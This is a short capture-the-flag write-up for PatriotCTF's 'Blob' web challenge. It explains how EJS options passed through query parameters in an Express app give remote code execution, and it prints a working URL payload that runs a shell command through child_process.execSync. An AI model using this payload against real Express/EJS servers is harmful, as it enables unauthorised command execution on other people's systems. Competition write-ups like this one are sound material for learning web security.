PatriotCTF | Blob (Web)

EJS prototype pollution (medium)

We first read the code :

require("express")()
  .set("view engine", "ejs")
  .use((req, res) => res.render("index", { blob: "blob", ...req.query }))
  .listen(3000);

The website offers limited interactions.

The objective here is to exploit the EJS template engine, since the flag is not stored in a variable or anything, our only course of action is to perform an RCE attack.

after some digging we can come through this Github issue that is still unfixed.

after trying the payload we get an exception, if the command has no errors it would show no output else it would show the error message of that command.

I changed the payload so it would generate the error message with the flag in it.

cat flag* | sh

http://chal.competitivecyber.club:3000/?settings[view%20options][client]=true&settings[view%20options][escapeFunction]=1;return%20global.process.mainModule.constructor._load(%27child_process%27).execSync(%27cat%20flag*%20|%20sh%27);

The next day the exception was fixed and you could run about anything and you would get the output directly, but I prefer the error based approach.

PreviousBuckeyeCTF 2024 | Homecooked & Quotes (Web)NextjailCTF 2024 | blind-calc, filter'd, parity 1 (Jail)

Last updated 1 year ago